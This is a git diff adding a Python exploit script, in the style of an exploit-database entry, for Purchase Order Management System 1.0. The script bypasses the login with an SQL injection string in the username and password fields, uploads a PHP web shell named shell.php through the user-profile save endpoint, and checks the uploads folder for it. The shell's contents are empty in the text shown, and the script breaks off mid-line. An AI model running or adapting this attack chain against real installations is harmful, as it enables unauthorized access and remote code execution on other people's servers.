diff --git a/exploits/php/webapps/50292.py b/exploits/php/webapps/50292.py new file mode 100755 index 000000000..d3239c39b --- /dev/null +++ b/exploits/php/webapps/50292.py @@ -0,0 +1,91 @@ +# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload +# Date: 2021-09-14 +# Exploit Author: Aryan Chehreghani +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html +# Version: v1.0 +# Tested on: Windows 10 - XAMPP Server + +# [ About the Purchase Order Management System ] : +#This Purchase Order Management System can store the list of all company's, +#suppliers for easily retrieving the suppliers' data upon generating the purchase order. +#It also stores the list of Items that the company possibly purchased from their suppliers. +#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. +#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request. + +#!/bin/env python3 +import requests +import time +import sys +from colorama import Fore, Style +if len(sys.argv) !=2: + print (''' +########################################################### +#Purchase Order Management System 1.0 - Remote File Upload# +# BY:Aryan Chehreghani # +# Team:TAPESH DIGITAL SECURITY TEAM IRAN # +# mail:aryanchehreghani@yahoo.com # +# -+-USE:python script.py # +# [+]Example:python3 script.py http://127.0.0.1/ # +########################################################### +''') +else: + try: + url = sys.argv[1] + print() + print('[*] Trying to login...') + time.sleep(1) + login = url + '/classes/Login.php?f=login' + payload_name = "shell.php" + payload_file = r"""""" + session = requests.session() + post_data = {"username": "'=''or'", "password": "'=''or'"} + user_login = session.post(login, data=post_data) + cookie = session.cookies.get_dict() + + if user_login.text == '{"status":"success"}': + print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!') + upload_url = url + "/classes/Users.php?f=save" + cookies = cookie + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"} + data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n" + print('[*] Trying to shell...') + time.sleep(2) + + try: + print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!') + upload = session.post(upload_url, headers=headers, cookies=cookie, data=data) + upload_check = f'{url}/uploads' + r = requests.get(upload_check) + if payload_name in r.text: + + payloads = r.text.split('